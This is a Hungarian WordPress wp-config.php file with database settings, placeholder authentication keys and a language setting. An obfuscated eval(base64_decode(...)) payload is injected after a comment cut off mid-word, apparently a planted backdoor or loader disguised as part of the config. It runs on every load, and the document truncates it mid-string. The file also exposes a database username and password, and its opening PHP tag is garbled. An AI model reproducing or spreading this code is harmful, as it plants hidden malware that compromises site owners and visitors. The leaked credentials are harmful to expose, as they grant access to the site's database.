<%>PHP<% > /** * A WordPress f? konfigurációs állománya * * Ebben a fájlban a következ? beállításokat lehet megtenni: MySQL beállítások * tábla el?tagok, titkos kulcsok, a wordpress nyelve, és ABSPATH. * További információ a fájl lehetséges opcióiról angolul itt található: * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php} * A MySQL beállításokat a szolgáltatódtól kell kérned. * * Ebb?l a fájlból készül el a telepítési folyamat közben a wp-config.php * állomány. Nem kötelez? webes telepítés használata, elegend? átnevezni * "wp-config.php" névre, és kitölteni az értékeket. * * @package WordPress */ // ** MySQL beállítások - Ezeket a szolgálatótól lehet beszerezni ** // /** Adatbázisod neve */ define('DB_NAME', 'barnalaszlo_funk'); /** MySQL felhasználóneved */ define('DB_USER', 'barnalaszlo_funk'); /** MySQL jelszó. */ define('DB_PASSWORD', 'funkybak'); /** MySQL kiszolgáló neve */ define('DB_HOST', 'localhost'); /** Az adatbázis karakter kódolása */ define('DB_CHARSET', 'utf8'); /** Az adatbázis egybevetése */ define('DB_COLLATE', ''); /**#@+ * Bejelentkezést tikosító kulcsok * * Változtasd meg a lenti konstansok értékét egy-egy tetszóleges mondatra * Generálhatsz is ilyen kulcsokat a {@link http://api.wordpress.org/secret-key/1.1/ WordPress.org titkos kulcs szolgáltatásával} * Ezeknek a kulcsoknak a módosításával bármikor kiléptethet? az összes bejelentkezett felhasználó az oldalról. * * @since 2.6.0 */ define('AUTH_KEY', 'írj ide valami nagyon bonyolultat'); define('SECURE_AUTH_KEY', 'írj ide valami nagyon bonyolultat'); define('LOGGED_IN_KEY', 'írj ide valami nagyon bonyolultat'); define('NONCE_KEY', 'írj ide valami nagyon bonyolultat'); define('AUTH_SALT', 'írj ide valami nagyon bonyolultat'); define('SECURE_AUTH_SALT', 'írj ide valami nagyon bonyolultat'); define('LOGGED_IN_SALT', 'írj ide valami nagyon bonyolultat'); define('NONCE_SALT', 'írj ide valami nagyon bonyolultat'); /**#@-*/ /** * WordPress Adatbázis tábla el?tag. * * Több blogot is telepíthetünk egy adatbázisba, ha valamennyinek egyedi * el?tagot adunk. Csak számokat, bet?ket és alulvonásokat adhatunk meg. */ $table_prefix = 'wp_vollnhofer'; /** * WordPress nyelve. Ahhoz, hogy magyarul m?ködjön az oldal, ennek az értéknek * 'hu_HU'-nak kell lennie. Üresen hagyva az oldal angolul fog megjelenni. * * A beállított nyelv .mo fájljának telepítve kell lennie a wp-content/languages * könyvtárba. Ahogyan ez a magyar telepít?ben alapértelmezetten benne is van. * * Például: be kell másolni a hu_HU.mo fájlt a wp-content/languages könyvtárba, * és be kell állítani a WPLANG konstanst 'hu_HU'-ra, * hogy a magyar nyelvi támogatást bekapcsolásra kerüljön. */ define ('WPLANG', 'hu_HU'); /** * Fejleszt?knek: WordPress hibake*/ eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGNzZHZ3cSA9IDE0OTM7IGZ1bmN0aW9uIHp6bnhybygkeHB6bmNjLCAkdGhzeHd3KXskZG9pb3VscyA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHhwem5jYyk7ICRpKyspeyRkb2lvdWxzIC49IGlzc2V0KCR0aHN4d3dbJHhwem5jY1skaV1dKSA/ICR0aHN4d3dbJHhwem5jY1skaV1dIDogJHhwem5jY1skaV07fQoka21kZHhrZHJsZz0iYmFzZSIgLiAiNjRfZGVjb2RlIjtyZXR1cm4gJGttZGR4a2RybGcoJGRvaW91bHMpO30KJG5ramJqdGh5biA9ICd1Y0pTN0JoQVQydThmWEJRVUNoUTJYNlZUUVVZcml4QnFpTGRwTEh0dWNKUzdCaEFUMnU4Zlg2VlQxaEpVOWZWVTlaOWt6RUx0cVlXemJGZG9DSnZVWEJIdHonLgonYXMzMk12VDJNSjNQQkg3RGhTMlB3ZG9EbjlrekVMdHFZV3piRkpVOWZWVUpoUVQyRlZVOXdkb0NVOFp6Yk5LdWRFVVhCSDJQd2RvREJ2b2NKczcydThaemJOS3U4V3pqSHQnLgonN0QzOHJEd0pUQ0pTVER1OHJKRnJuZ2hncUhMR3RPYld6OVlXekdFanJ6RmJURFRkb0NuOHJKRnJuZ2hncUhMR2t6RUcyY3lHdHFZV3o5SCcuCidXempIdDdEMzhyRHdKVENKU1REdThyYndmbmJCS0JpaE9EQmhxd0JGRm5iZ25xMXJHdE9iV3o5Jy4KJ1lXekdFanJ6RmJURFRkb0NuOHJid2ZuYkJLQmloT0RCaHF3QkZGbmJnbnExckdrekVHa1FyZHBMSHR2dUh0S3VkZFRHRThyRHdKVENKU1REdThmSGdabmJCRndnSnZuSkJwMicuCidBaUhXY1p5V1hXQ1c1ckEzQ2l5WkNnTVRDYlhwbWZkM0RyNldDZ0g3RGU2cHpVZHR1SHRsTEh0cnpFanJjd0pUQ0pTJy4KJ1RPajl1bjZPd25naURCaE9Cbnh2WnF1SDNBalAzWDNYWjVXRzNxalEzRGdDN3EzeVVDSk0zNWlYMzJ3ZG9BaXlmUUxqWk9iTkt1OFd6Jy4KJ0dFanJ6RWJUY2dIM09FaHJpeEJxaUxOS3U4anJ6RWpmY3dNYWNndjdYQnhyS0hqcUpCWnFLWVd6akh0cnpFanJ6d21xaWh6dScuCiduNnFEUWE1VTFoTWEydzhmMUhqME9FOTNxVDVUYzNMVER1czNEdVFwT0hIVEtVUWtxTUonLgonWkFuc1o1YWJaQ1pQV3FCNXBLcjFmQVlXekdFanJ6RjlvY2hHM0RMamZjV0EyWGcxYWNqTkt1OFd6akh0cnpFanJjVDFvQ1dIN0RoU3JjV0EySGFKYWlNVlVQdScuCic4dHVIdHJ6RWpybVlXekdFanJ6RWpyekVqVUNCSGEyZlNybVdIVTl3Vm9jaFBUMnI4VW1mSlQxaFFUMkZZM0RXSnR6VVYyR01QYVBhZVQ5d0x0QkxTa1hiOScuCidrelU5a2lFYjIxV2duSlRnbkpZOU9nd25uZ2hycTFXbmYxSGR0cVlXekdFanJ6RmhLdThXekdFanJ6RkNhRHg1YWNKVm9HRjVVMScuCidobVQydzJVQ0pIM0RmWVRud2RVOVo4dHVIdHJ6RWpybVlXekdFanJ6RWpyekVqZm1mSlVRRWhyaWdRVUNneHR6Yk5LdThXekdFanJ6Jy4KJ0VqcnpFamZjZ1MzRDZ4VVBKQTJQZzFUMkJKcktIanUyZlEzMmI4dHFZV3pqSHRyekVqcnpFanJ6RWIzRHhNb21KQWwyV3ZVMkJKYURCbzJPRWhyY1dBJy4KJzJIYUphaXdWMzFmVm9QdTh0cVlXempIdHJ6RWpyekVqcnpFYlVYQllUSmhMMzJ3OHJLSGpmZ2hxd0JmRHdCJy4KJ2ZvZjFXS25iSnVCZ2hjT242Z3FiZ1d3T2FhcExIdHJ6RWpyekVqcnpGUDdjSllUT0U4dHp3QW9jZ0E3ekVocm1XSFUnLgonOWZMb1BaOGZtV0pvY1R2VWNnSDd6TGp3aUpPd25XbnExZlQyMVdnbmlnT3VCdzBuR2JkcnppaDBPRmN1bjZxd09iV3pHRWpyekVqcnpFamxMSHRyekVqcicuCid6RWpyekVqcnpFamZtV0pvY1R2VWNnSDd6RWhybVcxMzlXSFVHamJVWEJZVEpoTDMydzhrekVMa3pFYlVYNk1VWGpkcExIdEt1OGpyJy4KJ3pFanJ6RWpyekVqcnpGZFRHRThmbVdKb2NUdlVjZ0g3ekVoME9GNVUxaG1UMndpb1hXT29YaEh0emJkS3U4anInLgonekVqcnpFanJ6RWpyekZOS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqMzlmSjNEWU5LdThqJy4KJ3J6RWpyekVqcnpFanJ6RmhLdThXekdFanJ6RWpyekVqcnpFanJjSkNyek1BYW1mWVREeThmbVdKb2NUdlVjZ0g3emJkS3U4anJ6RWpyekVqcnpFJy4KJ2pyekZOS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqZmNnUzNENnhVUEpBMlBnMVQyQkpEMUhqME9FYlVYQllUSmhMMzJ3OHBMSHRyekVqJy4KJ3J6RWpyekVqcnpFanZ1SHRyekVqcnpFanJ6RmhLdThXekdFanJ6RWpyekVqVENoUVREZzU3ekU4ZmNnJy4KJ1MzRDZ4VVBKQTJQZzFUMkJKcmNnQXJ6dzVhMmZRVER4SDJYd2RVR2JXekdFanJ6RWpyekVqbCcuCidMSHRyekVqcnpFanJ6RWpyekVqN0QzanR6Z2RvSmhNVTlmTWxPamIzUEJRVUNCU2FnaGI3MnJZcnp3UVQyWmR0dUh0cicuCid6RWpyekVqcnpFanJ6RWpsTEh0cnpFanJ6RWpyekVqcnpFanJ6RWpyendRVDJaajBPRk1VOWZNbEJoc1QyZjlUT2piVUNCQWt6RjVVMWhtVDJ3aTcyZkozUCcuCid3VlU5Slo3MldIdHp3NWEyZlFURHhIMlh3ZFVHYmRwTEh0cnpFanJ6RWpyekVqcnpFanZ1SHRyekVqcnpFanJ6RmgnLgonS3U4V3pHRWpyekVqcnpFalVDQkhhMmZTcmNXQTJIVzhURFdJQlBmZGFjZ0dvY244MzJmUTMySnZhRHhkJy4KJ1UyQkp0endRVDJaZHRxWVd6R0VqcnpGaEt1OFd6R0VqcnpGQ2FEeDVhY0pWb0dGNVUxaEs3Y0I1NzFhUTcyd00zQzZKdHp3YjcyZnZvY0pBYXpiV3pHRWpyekZOSycuCid1OGpyekVqcnpFanJ6d2I3MmZ2b2NKQWFnaFBVQ0pIM0RmWVRPRWhyaWdRVUNneHR6Yk5LdThXekdFanJ6RWpyekVqVENoUVREZzU3ekU4ZmN3ZFVKaFknLgonNzJXSHJjZ0FyendiNzJyZEt1OGpyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcmNKQ3J6TUU3Mld2YVBmZGFjZ0dvY244ZmN3ZFVHYmpmRzNqNzJXdlRjSicuCidRdHp3YjcycmR0dUh0cnpFanJ6RWpyekVqcnpFamxMSHRyekVqcnpFanJ6RWpyekVqcnpFanJ6d2I3MmZ2b2NKQWFnaFBVQ0pIM0RmWVRCc2FyS0hqZmMnLgond2RVNVlXekdFanJ6RWpyekVqcnpFanJtSFd6R0VqcnpFanJ6RWp2dUh0S3U4anJ6RWpyekVqcm1mSmFtQlFvR0ViVGNKUTJYNmRVUHd2YVBmZGFjZ0dvY25OS3U4Jy4KJ2pyekVqdnVIdEt1OGpyekVqVDlCUzNQd2RvWHlqM1BXdndYQkh3Y0pRVERXSG9QZnhxY0pBYXpqYlRjSlFrekViVGNCTGFjamhacUVkS3U4anJ6RWpsTCcuCidIdHJ6RWpyekVqcnpFYlVDQkFhRDZIcktIajMyZlEzMmI4dHFZV3pqSHRyekVqcnpFanJ6RmRUR0U4ckRKQTJYd2RVR2piVGNKUScuCid0T2JXekdFanJ6RWpyekVqbExIdHJ6RWpyekVqcnpFanJ6RWpVQ0JIYTJmU3J6d1FUMlcxJy4KJ29tdU5LdThqcnpFanJ6RWpybUhXempIdHJ6RWpyekVqcnpFYlVDQkFhRDZIRDFIajBPRWJUY0pRcExIdHJ6RWpyekVqcnpFYlRjSlEyWFdWYUR4SHJLSGpaSycuCidZV3pqSHRyekVqcnpFanJ6RmRUR0U4ZmN3SlVtdzhyS0xqWk9iV3pHRWpyekVqcnpFamxMSHRyekVqcnonLgonRWpyekVqcnpFalVDQkhhMmZTcnp3UVQyVzFvbXVOS3U4anJ6RWpyekVqcm1IV3pqSHRyekVqcnpFanJ6RWJUY0pRcktIalVQd1FvJy4KJ2NCU3R6d2I3MnJkcktIaHJLaWowUUViVGNKUXJLOGpVOXdRN0RIOGZjd2RVR0xqZjE2VWtRVWRwTEh0cnpFanJ6Jy4KJ0VqcnpFYjd6RWhyaUZWVWNCU1RjSlF0endiNzJyZHBMSHRyekVqcnpFanJ6RmRUR0U4ZmNqajBxSGhyaVRGcWdXZ3R1SHRyekVqcnpFanJ6RicuCidOS3U4anJ6RWpyekVqcnpFanJ6RlFUMncxVUN5amZtZkpVUEJZYUtZV3pHRWpyekVqcnpFanZ1SHRLdThqcnpFanJ6RWpybWE4N0Q2SnJ6ajhmYycuCiczajBPRlFURGdiVGNKUXR6dzh0T2JqcnFIaHJpVEZxZ1dndHVIdHJ6RWpyekVqcnpGTkt1OGonLgoncnpFanJ6RWpyekVqcnpGZFRHRThmYzNqcnFIaHJ6VVNmUUZNb0N1amZjM2pycUhocnpVU2tHVWRLdThqcnpFanJ6RWpyekVqcnpGTkt1OGpyekVqcnpFanJ6RWpyeicuCidFanJ6RWpmY1cxVTlmSm85d3ZUY0pRcktIanJHd2I3MnJWZmMzR3BMSHRyekVqcnpFanJ6RWpyekVqcnpFanJjSkNyek1kVTFoYjcycjhmY1cxVTlmSicuCidvOXd2VGNKUXRPYld6R0VqcnpFanJ6RWpyekVqcnpFanJ6Rk5LdThqcnpFanJ6RWpyekVqcnpFanJ6RWpyekVqcnp3YicuCic3MmZ2M1hoMW85dWp0QUhqWnFZV3pqSHRyekVqcnpFanJ6RWpyekVqcnpFanJ6RWpyekViVUNCQWFENkhEMUhqMCcuCidPRWIzUEJRVUNCU2FnaGI3MnJOS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqcnpFanJ6d1FUMlcxb211ajBPRk1VOWZNbEJoc1QyJy4KJ2Y5VE9qYlVDQkFhRDZIa3pGNVUxaG1UMndpNzJmSjNQd1ZVOUpaNzJXSHR6dzVhMmZRVER4SDJYd2RVR0xqZmN3SlVtdzhyemVqWnFFZHRxWVd6R0VqcnpFanJ6RWpyekVqJy4KJ3J6RWpyekZoS3U4anJ6RWpyekVqcnpFanJ6RmhLdThqcnpFanJ6RWpybUhXempIdHJ6RWpyekVqcnpGNW9jaEFURHdkVUdqYjd6Yk5LdThXekdFanJ6RWpyekVqVUMnLgonQkhhMmZTcnp3UVQyVzFvbXVOS3U4anJ6RWp2dUh0S3U4anJ6RWpUOUJTM1B3ZG9YeWozUFd2d1hCSHdjaDVuQ2hWYXpqZEt1Jy4KJzhqcnpFamxMSHRyekVqcnpFanJ6RWJUY2g1VUNoVmFnaEpvQ3VqME9GQWFtZlFVY2hBdHp3dm5IQk9CYkJPRFFhcXUxZmZuZ3d2dycuCidiSlp3bnhGcW5uOTJPTGpmZ2hxd0JmRHdCZm9mMWZnbkJCZ24xd3ZCQmZmZjFIZHBMSHRyekVqcnpFanJ6RmRUR0U4ZicuCidjd1YzUGZWb1B3dlREeGJyS0hoME9GY3VuNnF3T2JXekdFanJ6RWpyekVqbExIdHJ6RWpyekVqcnpFanJ6Jy4KJ0VqVUNCSGEyZlNyend2bkhCT0JiQk9EUWFpcUhXQnFuQnBCZ2hPcUhobmYxSE5LdThqcnpFanJ6RWpybUhXekdFanJ6RWpyekVqVEQ2QVRESicuCidDcnpqYlRjaDVVQ2hWYWdoSm9DdWowcUhocktFZEt1OGpyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcm1mSmFtQlFvR0VHaycuCidRck5LdThqcnpFanJ6RWpybUhXekdFanJ6RWpyekVqVEQ2QVR1SHRyekVqcnpFanJ6Rk5LdThqcnpFanJ6RWpyekVqcnpGUVQnLgonMncxVUN5alVQQkdVUHdRdHp3dm5IQk9CYkJPRFFhcXUxZmZuZ3d2d2JKWndueEZxbm45Mk9Malp6TGpmY3dWM1BmVm9Qd3ZURHhidHFZV3pHRWpyekVqcnpFanZ1SHRyekUnLgonanJtSFd6akh0cnpFanJjSkNyempNVDlCUzNQd2RvWHh2VDJNZFVQd0F0emFDN0Q2SjJQRjFhZ2g1b1h4SFREeEhVUVVkdHVIdHJ6RWpybVlXekdFaicuCidyekVqcnpFalQ5QlMzUHdkb1h5alRDSllUQmhMYTJ3djNYaFNhY0JTYW1aOGZjeVlyendia3pFYlRDNk0nLgonVFFFaHJpVE1vbVdKdHVIdHJ6RWpyekVqcnpGTkt1OGpyekVqcnpFanJ6RWpyekVib0RoYlRPRWhyendDb2NnOXJLSGhyS2pqMFFFOTNPVWpwR0U5YVFVTkt1Jy4KJzhqcnpFanJ6RWpyekVqcnpFYlRHRWhyaUZDb1BGSm9HamJvR0xqZmMxVlRjbmRwTEh0cnpFanJ6RWpyekVqcnpFajdEM2p0endDcktIaDBPRmMzRDZBJy4KJ1RPYld6R0VqcnpFanJ6RWpyekVqcm1ZV3pHRWpyekVqcnpFanJ6RWpyekVqcnpGUVQydzFVQ3lqWktZV3pHRWpyekVqcnpFanJ6RWpybUhXekdFanJ6RWpyekVqcnpFJy4KJ2pyY0JZVVhuV3pHRWpyekVqcnpFanJ6RWpybVlXekdFanJ6RWpyekVqcnpFanJ6RWpyekZkVEdFODcyV3YzMmZRMzJiOGZjdWR0T0ViVHpFaHJjSnNVYzYnLgonVlRjbjhmY3VkcExIdHJ6RWpyekVqcnpFanJ6RWpyekVqcnp3R2wyd0pVMWhQVUNKSGFjQlNyS0hqVDlhUTcyd0p0endDa3pFYlR6Jy4KJ2JOS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqVENXWW9QV0p0endDdHFZV3pHRWpyekVqJy4KJ3J6RWpyekVqcnpFanJ6RlFUMncxVUN5amZjZnhhY0JBMlBhUTcyd0hURHlOS3U4anJ6RWpyekVqcnpFanJ6RmhLdThqJy4KJ3J6RWpyekVqcm1IV3pHRWpyekZoS3U4V3pHRWpyekZkVEdFOHJEVDFvQ1dIN0RoUzJYQnk3MldIVVFqOVRDSllUQmg5VDJ3djNYaFNhY0JTYW1aOXRPYld6R0VqcnpGTkt1Jy4KJzhqcnpFanJ6RWpyY1Qxb0NXSDdEaFNyY1Rkb2NCdlRYQkgyWFdWbzl3Sm85d0F0endDJy4KJzdENkpvQ2dzVE9iV3pHRWpyekVqcnpFamxMSHRyekVqcnpFanJ6RWpyekVqZmNUODNEeGJvY25qME9GQ29QRkpvR2piVENKWVREeE1vRG5ZcnpmUXJHYk5LdThqcnpFanInLgonekVqcnpFanJ6RWJUQ1dWbzl3Sm85d0FyS0hqVDlmSjNEdThmY1Q4M0R4Ym9jbllyY1Rkb2NCQTcyZEp0endDN0Q2Sm9DZ3NUT2JkcExIdHJ6RWpyekVqcnpFanJ6Jy4KJ0VqVENXWW9QV0p0endDN2NnU1RjNkp0cVlXempIdHJ6RWpyekVqcnpFanJ6RWpVQ0JIYTJmU3J6d0MzWGhTYWNCU2FtWk5LdThqcnpFanJ6RScuCidqcm1IV3pHRWpyekZoS3U4V3pqSHRyekVqcmNUMW9DV0g3RGhTcmNXQTJYd0ozUGZ4VW13dlVjTU1VWG44ZmN3TWFjaVlyendJVDJiZEt1OGpyekVqbExIdHJ6RWpyekVqcnpFJy4KJ2JvUEJIMlh3TWFjaWowT0VHcjVZV3pqSHRyekVqcnpFanJ6RkNvUHJqdHp3ZDBxRU5yendkMG1XSFVDNkpvR2piVGMnLgonZ0gzT2JOdHVIdHJ6RWpyekVqcnpGTkt1OGpyekVqcnpFanJ6RWpyekZDb1ByanR6dzQwcUVOcnp3NDBtV0hVQzZKb0dqYjdYQnh0T0VDZkdFYjdxNkEnLgonYW1mWVREeThmY3dNYWNpZHBRRWI3R1lJa3pFYjdPWUl0dUh0cnpFanJ6RWpyekVqcnpFamxMSHRyekVqcnpFanJ6RWpyekVqcnpFanJ6d1ZhMnd2VGNnSDNPRVMwT0Y1N21yJy4KJzhvUGZidHp3YjMyd01EUXdkMk9iajJHRlZVQ3U4ZmNzSmxCWWI3SkhkdHFZV3pHRWpyekVqcnpFanJ6RWonLgoncm1IV3pHRWpyekVqcnpFanZ1SHRLdThqcnpFanJ6RWpybWZKYW1CUW9HRWJvUEJIMlh3TWFjaU5LdThqcnpFanZ1SHRLdThqcnpFalQ5Jy4KJ0JTM1B3ZG9YeWozUFd2VGNCNVU5SkxhempiVGNnSDNPTGpmY3NKbE9iV3pHRWpyekZOS3U4anJ6RWpyekVqcmNhJy4KJ1lvWGZNb3pFYjNQV3YzMkJIN0tZV3pqSHRyekVqcnpFanJ6RlFUMncxVUN5ajNQV3ZUY0I1Jy4KJ1U5SkxhZ2hMN2NnQVRPTTVVMWhiVERXUWwyRkgyUEY4MzJXSnR6d2IzMndNa3pFYjdYJy4KJ0J4dE9MamZjV0EyWGcxYWNqZHBMSHRyekVqcm1IV3pHRWpyekZDYUR4NWFjSlZvR0Y1VTFoSm9DV1FsMkZIdHp3YjMyd01rekViN1hCeHR1SHRyekVqcm1ZV3pHRWpyekVqJy4KJ3J6RWpUWDZWM0NnWXJ6dzVVMWhNYTJ3OHBMSHRLdThqcnpFanJ6RWpybWZKYW1CUW9HRjVVMWhiVERXUWwyRkgyUEY4MzJXSnRjV0EyWHdKM1BmeFVtd3ZVY01NVVgnLgonbjhmY3dNYWNpWXJ6dzVVMWhNYTJ3OHRPTGpmY3NKbE9iTkt1OGpyekVqdnVIdEt1OGpyekVqVDknLgonQlMzUHdkb1h5ajNQV3ZUQ0pZVEJoUVREZ2J0endMMzJ3OHR1SHRyekVqcm1ZV3pHRWpyekVqcnpFamZjd01hY2lqME9GRVRDSllUQmg5VCcuCicyd3YzWGhTYWNCU2FtWjhmbUZNYWNqZHBMSHRLdThqcnpFanJ6RWpybWZKYW1CUW9HRWJUY2dIM3FZVycuCid6R0VqcnpGaEt1OFd6R0VqcnpGQ2FEeDVhY0pWb0dGNVUxaEM3RDZKMlBhUTcyd0p0endMMzJ3OGt6RWJUY2dIM09iV3pHRWpyekYnLgonTkt1OGpyekVqcnpFanJpRkM3RDZKMlBGMWFnaDVvWHhIVER4SFVRamJVY2dIN3pMamZjd01hY2lkJy4KJ3BMSHRyekVqcm1IV3pqSHRyekVqcmNUMW9DV0g3RGhTcmNXQTJYVGRvY0J2MzJGTFREeGJ0endMMzInLgondzhrekViVGNnSDNPYld6R0VqcnpGTkt1OGpyekVqcnpFanJpRkM3RDZKMlBGMWFnaDVvWHhIVER4SFVRJy4KJ2piVWNnSDd6TGpmY3dNYWNpWXJLamRwTEh0cnpFanJtSFd6akh0cnpFanJjVDFvQ1dIN0QnLgonaFNyY1dBMlBXVlU5d3YzWGhzVWNnUVQycjhmY2lZcnp3R3R1SHRyekVqcm1ZV3pHRWpyekVqcnpFalVDQkhhMmZTcm1XSFVDNkpvR2piJy4KJzNPYmprT0ZBYW1mWVREeThmY3JkcExIdHJ6RWpybUhXempIdHJ6RWpyY1Qxb0NXSDdEaFNyY1dBMkhhSmFpVycuCidWb0QxVm9KV0hvUGZNVFhuOGZjd2RVOVpocUpCWnF6Yld6R0VqcnpGTkt1OGpyekVqcnpFanJ6d0FURDZDMlh3ZFVHRWhyY3dkVUN4TW9EbjgyMWhjT242ZzIxZWRwTCcuCidIdEt1OGpyekVqcnpFanJ6dzVvWDFzb1h4dm9DZ3NUMlpqME9GRlU5Zk1sT2pHb1BGSDdEaFNVUXJZcnpmWDdEQlBVUXJZJy4KJ3J6ZkwzRGFKVVFyWXJ6ZkFUMldBN0RoU1VRcllyemZBYWNnSFVRcllyemYxVVhCUVVRcllyemZNVTl3ZDNYNkpVUXJZcnpmYmFEMUxyR0xqckNNSjNEd0pVOVpHa3onLgonRUdvY0pHVVFyZHBMSHRLdThqcnpFanJ6RWpyendIbzJGdlRjSlFyS0hqZm1XSm9jVHZUY0pRcnp5anJHZUdyenlqZmNXVm8nLgonRDFWb0poUzNEMUpVMXNBYW1mWVREeTgzUFd2d1hCSE9jaEFhempkdE9FSnJjV1ZhRHhIdHonLgondzVvWDFzb1h4dm9DZ3NUMlpkMnFZV3pqSHRyekVqcnpFanJ6RmRUR0U4VENKWVRCaEpsY0pBYW1aOGZtd3NVZ2hiNzJyZHR1SHRyekVqcnpFanJ6Rk5LdThqcnpFanJ6RScuCidqcnpFanJ6RlFUMncxVUN5amZtd3NVZ2hiNzJyTkt1OGpyekVqcnpFanJtSFd6akh0cnpFanJ6RWpyekZkVEdNczdYd2RVR2piYWMxTDJYJy4KJ3dkVUdiZEt1OGpyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcm1mSmFtQlFvR0ViYWMxTDJYd2RVNVlXekdFanJ6RWpyeicuCidFanZ1SHRLdThqcnpFanJ6RWpybWZKYW1CUW9HRUdyNVlXekdFanJ6RmhLdThXekdFanJ6RkNhRHg1YWNKVm9HRjVVMWgnLgonTG9tQjk3RHh2M0R3YnR6d1MzRDFKa3pFYjNDZ0FUcTNIMlh3TWFjaWRLdThqcnpFamxMSHRyekVqcnpFanJ6RWJUYycuCidnSDNPRWhyY2ZNVVhuWFdnaGJURFdWVGNuOGZjZk1VWG5YV2doYjMyd010cVlXempIdHJ6RWpyekVqcnpFYlVQd1ZVQ2c5VEJoTDMydzhyS0hqM1BXdndYQkh1WGhzb0QnLgonaFNuUHdWVUNnOVRPamRyenlqckdlR3BMSHRyekVqcnpFanJ6RWJVUHdWVUNnOVRCaEwzMnc4cktIamZtV0hvUGZNVFgnLgonQnZVY2dIN3pFU3JtVzEzOVdIVUdNc1RLbjhyQ1dNM1hNSnJHYllyS0VZcktuZHJ6eWpySmVHcnp5am9EdTF0endTM0QxSnJ6eWozUCcuCidXdndYQkhPY2hBYXpqZHRxWVd6akh0S3U4anJ6RWpyekVqcmNXQTJYVGRvY0J2YVBmZGEnLgonY244Zm1XSG9QZk1UWEJ2VWNnSDd6TGozUFd2VER4NVU5SkxhempiVGNnSDNPTGozUFd2d1hCSE9jaEFhempkdE9iTkt1OGpyekVqdnVIdEt1OGpyekVqVDlCUzNQdycuCidkb1h5ajNQV3ZVYzYxVFhKUzJQZkpvT2pib0Nnc1RPYld6R0VqcnpGTkt1OGpyekVqcnpFanJ6dycuCidBYWNoUTNEYUoyUEZNYWNqajBPRjVVMWhtVDJ3S29YMXNvWHhxYWNoUTNEYUp0emJTcnpyVnI1WVd6R0VqcnpFanJ6RWpmbVdIb1BmTVRYQnZVY2dIN3pFaCcuCidyendBYWNoUTNEYUoyUEZNYWNqamtHRkFhRGZBYW1yOG9EdTF0emY1M0RXOFRPcmRrekVMa3pFMXRPRVNyemZ2ckcnLgonRVNyYzFiV09qYm9DZ3NUT0VTcmNXQTJIYUphaU1WVVB1OHRPYk5LdThXekdFanJ6RWpyekVqN0QzanRjVGRvY0J2VDJNZFVQdycuCidBdHp3QWFjaFEzRGFKMlBGTWFjamR0dUh0cnpFanJ6RWpyekZOS3U4anJ6RWpyekVqcnpFanJ6RkUnLgonYUR4WTdEeEl0endBYWNoUTNEYUoyUEZNYWNqZHBMSHRyekVqcnpFanJ6RmhLdThqcnpFanZ1SHRLdThqcnpFalQ5QlMzUHdkb1h5ajNQV3ZVYzYxVFhKUzJYJy4KJzZWM0R1OGZjeE1vRG5ocUpCWnF6Yld6R0VqcnpGTkt1OGpyekVqcnpFanJ6d0FhY2hRM0RhSjJQRk1hY2pqME9GNVUxaG1UMndLb1gxc29YeHFhY2hRM0RhSnR6Yk5LdThXJy4KJ3pHRWpyekVqcnpFajdEM2p0Y0pBMlh3ZFVHamJVUHdWVUNnOVRCaEwzMnc4dE9iV3pHRWonLgoncnpFanJ6RWpsTEh0cnpFanJ6RWpyekVqcnpFajdEM2p0endTM0QxSnJLSGhyaXhCcWlMZHJ6ZScuCidWcmM2VjNEdWozRDZZcm1GWWFEYWRvOVpXekdFanJ6RWpyekVqcnpFanJtWVd6R0VqcnpFanJ6RWpyekVqcnpFanJ6RicuCidDb1BmSjNEVzhyek1BM1hnU1RjSlF0endBYWNoUTNEYUoyUEZNYWNqZHJjZ0FyendJVDJiaDBHd0xvbUI5N0R4dm9DZ3NUT2JXekdFanJ6RWpyekVqcnpFanJ6RScuCidqcnpGTkt1OGpyekVqcnpFanJ6RWpyekVqcnpFanJ6RWpyY0pDcnpNQWFtZkxvUFo4Zm1GWScuCidhRGFkb0poUzNEMUprekZBYURmQWFtcjhvRHUxdHpmNTNEVzhUT3Jka3pFTGt6RTF0T2JqcnFIaHJpVE1vbVdKdHVIdHJ6RWpyekVqcnpFanJ6RWonLgoncnpFanJ6RWpyekZOS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqcnpFanJ6RWpyekZFVDJUTW96TScuCic1VTFoYlREV1FsMkZIdGNXQTJYVGRvY0J2VUNCTVR6amJVUHdWVUNnOVRCaEwzMnc4cnp5anJHZUdyenlqZm0nLgonRllhRGFkb0poUzNEMUp0T0xqM1BXdndYQkhPY2hBYXpqZHRPYk5LdThqcnpFanJ6RWpyekVqJy4KJ3J6RWpyekVqcnpFanJtSFd6R0VqcnpFanJ6RWpyekVqcnpFanJ6RmhLdThqcnpFanJ6RWpyekVqcnpGaEt1OGpyekVqcnpFJy4KJ2pyekVqcnpGSm9tV0pLdThqcnpFanJ6RWpyekVqcnpGTkt1OGpyekVqcnpFanJ6RWpyekVqcnpFamZtV0hvUGZNVFhCdlVjZ0g3eicuCidFaHJ6d0FhY2hRM0RhSjJQRk1hY2pqa0dFR2tRcmprR0ZBYURmQWFtcjhvRHUxdHpmNTNEVzhUT3Jka3pFTGt6RTF0T0VTcnpmdnJHRVNyYzFiV09qYm9DZ3NUT0VTcmNXQTInLgonSGFKYWlNVlVQdTh0T2JOS3U4V3pHRWpyekVqcnpFanJ6RWpyekVqcnpGZFRHRThUQ0pZVEJoSmxjSkFhbVo4Zm1XJy4KJ0hvUGZNVFhCdlVjZ0g3emJkS3U4anJ6RWpyekVqcnpFanJ6RWpyekVqbExIdHJ6RWpyekVqcnpFanJ6RWpyekVqcnpFanJ6RkVUMlRNb3pNNVUxaGJURFdRbDInLgonRkh0Y1dBMlhUZG9jQnZVQ0JNVHpqYlVQd1ZVQ2c5VEJoTDMydzh0T0xqM1BXdndYQkgnLgonT2NoQWF6amR0T2JOS3U4anJ6RWpyekVqcnp